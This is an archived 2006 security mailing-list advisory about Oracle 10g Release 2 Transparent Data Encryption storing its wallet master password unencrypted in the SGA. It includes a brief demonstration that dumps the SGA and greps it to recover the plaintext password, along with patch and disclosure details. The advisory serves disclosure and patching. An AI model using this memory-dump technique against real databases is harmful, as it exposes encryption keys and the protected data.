From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 19 Jan 2006 16:57:52 +0200
Subject: [NEWS] Oracle Transparent Data Encryption Information Disclosure Vulnerability
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060119225819.515B75850@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Oracle Transparent Data Encryption Information Disclosure Vulnerability
------------------------------------------------------------------------
SUMMARY
The SGA (System Global Area) is "the part of the RAM used by the ORACLE
instance. This part of memory is common to other ORACLE processes. All
necessary informations necessary for the instance operation are present
here. Transparent Data Encryption(TDE) is beneficial for simple and easy
encryption of sensitive data in table columns. Simple and easy because
users or applications need not manage the encryption and decryption of
data any more, it is handled by the database - so there is no need to
manage views, tables, or triggers to decrypt data".
Oracle Transparent Data Encryption stores keys in their unencrypted form
in the SGA, a skilled attacker or non-security DBA can retrieve these
plaintext keys.
DETAILS
Vulnerable Systems:
* Oracle Database versions 10g Release 2
The Oracle security feature "Transparent Data Encryption" is storing the
masterkey unencrypted in the SGA. A skilled attacker or non-security DBA
can retrieve the plaintext masterkey.
Example:
SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";
System altered.
SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release
10.2.0.1.0
Production With the Partitioning, OLAP and Data Mining options
[oracle@ora10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin
[oracle@ora10201 /]$ cd /tmp
[oracle@ora10201 /]$ dumpsga
[oracle@ora10201 /]$ strings * | grep -iH secretpassword
secretpassword
secretpassword
secretpassword
[] Excerpt from the SGA
/oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@
d$d$^@?y*cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0 d$d d$-
^@^@0 d$L4^L ^Xp / ]/ <8f>^Dsecretpassword^@^M^U^B^@ d$
4^Lfile:/oracle/10.2.0/admin/ora10201/wallet[]
Patch Availability:
Oracle fixed this issue with the patches from the critical patch update
January 2006 for Oracle 10g Release 2.
History:
11.07.05 - Oracle secalert was informed
12.07.05 - Bug confirmed
17.01.06 - Oracle published the Critical Patch Update January 2006 (CPU
January 2006)
17.01.06 - Red-Database-Security published this advisory
ADDITIONAL INFORMATION
The information has been provided by
<mailto:ak@red-database-security.com.> Alexander Kornbrust.
The original article can be found at:
<http://www.red-database-security.com/advisory/oracle_tde_unencrypted_sga.html>; http://www.red-database-security.com/advisory/oracle_tde_unencrypted_sga.html
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
